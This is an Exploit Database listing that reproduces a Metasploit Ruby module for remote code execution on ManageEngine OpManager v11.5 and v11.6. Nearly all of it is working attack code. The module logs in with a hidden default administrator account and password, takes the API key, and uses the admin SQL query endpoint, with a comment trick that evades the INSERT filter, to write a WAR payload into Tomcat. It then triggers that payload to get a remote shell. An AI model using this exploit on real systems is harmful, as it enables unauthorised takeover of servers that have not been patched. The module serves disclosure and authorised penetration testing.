ManageEngine OpManager – Remote Code Execution (Metasploit)

• Exploit Database
• 16 阅读

• 作者： Metasploit
  日期： 2015-09-17
• 类别：

  • remote
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/38221/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  # It removes large object in database, shoudn't be a problem, but just in case....
  Rank = ManualRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info={})
  super(update_info(info,
  'Name' => 'ManageEngine OpManager Remote Code Execution',
  'Description'=> %q{
  This module exploits a default credential vulnerability in ManageEngine OpManager, where a
  default hidden account "IntegrationUser" with administrator privileges exists. The account
  has a default password of "plugin" which can not be reset through the user interface. By
  log-in and abusing the default administrator's SQL query functionality, it's possible to
  write a WAR payload to disk and trigger an automatic deployment of this payload. This
  module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
  ],
  'References' =>
  [
  [ 'EDB', '38174' ],
  ],
  'Platform' => ['java'],
  'Arch' => ARCH_JAVA,
  'Targets'=>
  [
  ['ManageEngine OpManager v11.6', {}]
  ],
  'Privileged' => false,
  'DisclosureDate' => 'Sep 14 2015',
  'DefaultTarget'=> 0))
  end
  
  def uri
  target_uri.path
  end
  
  def check
  # Check version
  vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
  
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri(uri, 'LoginPage.do')
  })
  
  unless res && res.code == 200
  return Exploit::CheckCode::Safe
  end
  
  if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
  version = $1
  if Gem::Version.new(version) <= Gem::Version.new('11.6')
  return Exploit::CheckCode::Appears
  else
  # Patch unknown
  return Exploit::CheckCode::Detected
  end
  elsif res.body =~ /OpManager/
  return Exploit::CheckCode::Detected
  else
  return Exploit::CheckCode::Safe
  end
  end
  
  def sql_query( key, query )
  res = send_request_cgi({
  'method' => 'POST',
  'uri'=> normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
  'vars_get' => { 'apiKey' => key },
  'vars_post' => { 'query' => query }
  })
  
  unless res && res.code == 200
  fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
  end
  
  res
  end
  
  def exploit
  print_status("#{peer} - Access login page")
  res = send_request_cgi({
  'method' => 'POST',
  'uri'=> normalize_uri(uri, 'jsp', 'Login.do'),
  'vars_post' => {
  'domainName' => 'NULL',
  'authType' => 'localUserLogin',
  'userName' => 'IntegrationUser', # Hidden user
  'password' => 'plugin' # Password of hidden user
  }
  })
  
  if res && res.code == 302
  redirect =URI(res.headers['Location']).to_s.gsub(/#\//, "")
  print_status("#{peer} - Location is [ #{redirect} ]")
  else
  fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
  end
  
  
  # Follow redirection process
  print_status("#{peer} - Following redirection")
  res = send_request_cgi({
  'uri' => redirect,
  'method' => 'GET'
  })
  
  if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
  api_key = $1
  print_status("#{peer} - Retrieved API key [ #{api_key} ]")
  else
  fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
  end
  
  app_base = rand_text_alphanumeric(4 + rand(32 - 4))
  war_payload = payload.encoded_war({ :app_name => app_base }).to_s
  war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
  
  print_status("#{peer} - Executing SQL queries")
  
  # Remove large object in database, just in case it exists from previous exploit attempts
  sql = 'SELECT lo_unlink(-1)'
  sql_query(api_key, sql)
  
  # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
  sql = 'SELECT lo_create(-1)'
  result = sql_query(api_key, sql)
  if result.body =~ /lo_create":([0-9]+)}/
  lo_id = $1
  else
  fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
  end
  
  # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
  sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
  sql_query(api_key, sql)
  
  # Export our large object id data into a WAR file
  sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
  sql_query(api_key, sql)
  
  # Remove our large object in the database
  sql = 'SELECT lo_unlink(-1)'
  sql_query(api_key, sql)
  
  register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
  register_file_for_cleanup("tomcat//webapps//#{app_base}")
  
  10.times do
  select(nil, nil, nil, 2)
  
  # Now make a request to trigger the newly deployed war
  print_status("#{peer} - Attempting to launch payload in deployed WAR...")
  res = send_request_cgi(
  {
  'uri'=> normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
  'method' => 'GET'
  })
  # Failure. The request timed out or the server went away.
  break if res.nil?
  # Success! Triggered the payload, should have a shell incoming
  break if res.code == 200
  end
  
  end
  
  end